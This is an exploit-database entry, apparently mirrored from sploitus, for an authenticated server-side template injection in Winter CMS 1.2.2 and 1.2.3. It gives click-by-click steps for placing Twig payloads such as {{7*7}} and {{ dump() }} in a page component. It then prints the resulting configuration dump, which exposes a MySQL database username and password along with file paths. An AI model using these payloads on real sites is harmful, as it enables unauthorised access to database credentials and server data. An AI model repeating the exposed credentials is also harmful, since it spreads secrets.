Share
## https://sploitus.com/exploit?id=1337DAY-ID-39182
# Exploit Title: Winter CMS 1.2.2 / 1.2.3 - Server-Side Template Injection (SSTI) (Authenticated)
# Exploit Author: tmrswrr
# Date: 12/05/2023
# Vendor: https://wintercms.com/
# Software Link: https://github.com/wintercms/winter/releases/v1.2.2
# Vulnerable Version(s): 1.2.2 / 1.2.3
#Tested : https://www.softaculous.com/demos/WinterCMS


1 ) Login with admin cred and click CMS > Pages field > Plugin components > 
    https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup
2 ) Write SSTI payload : {{7*7}}
3 ) Save it , Click Priview : 
    https://demos6.demo.com/WinterCMS/demo/plugins
4 ) You will be see result : 
    49
 Payload :
    {{ dump() }}
 Result :
 
        "*::database" => array:4 [▼
          "default" => "mysql"
          "connections" => array:4 [▼
            "sqlite" => array:5 [▼
              "database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite"
              "driver" => "sqlite"
              "foreign_key_constraints" => true
              "prefix" => ""
              "url" => null
            ]
            "mysql" => array:15 [▼
              "charset" => "utf8mb4"
              "collation" => "utf8mb4_unicode_ci"
              "database" => "soft_pw3qsny"
              "driver" => "mysql"
              "engine" => "InnoDB"
              "host" => "localhost"
              "options" => []
              "password" => "8QSz9(pT)3"
              "port" => 3306
              "prefix" => ""
              "prefix_indexes" => true
              "strict" => true
              "unix_socket" => ""
              "url" => null
              "username" => "soft_pw3qsny"
            ]
            "pgsql" => array:12 [▶]
            "sqlsrv" => array:10 [▶]
          ]
          "migrations" => "migrations"
          "redis" => array:4 [▼
            "client" => "phpredis"
            "options" => array:2 [▼
              "cluster" => "redis"
              "prefix" => "winter_database_"
            ]
            "default" => array:5 [▼
              "database" => "0"
              "host" => "127.0.0.1"
              "password" => null
              "port" => "6379"
              "url" => null
            ]
            "cache" => array:5 [▼
              "database" => "1"
              "host" => "127.0.0.1"
              "password" => null
              "port" => "6379"
              "url" => null
            ]
          ]
        ]
      ]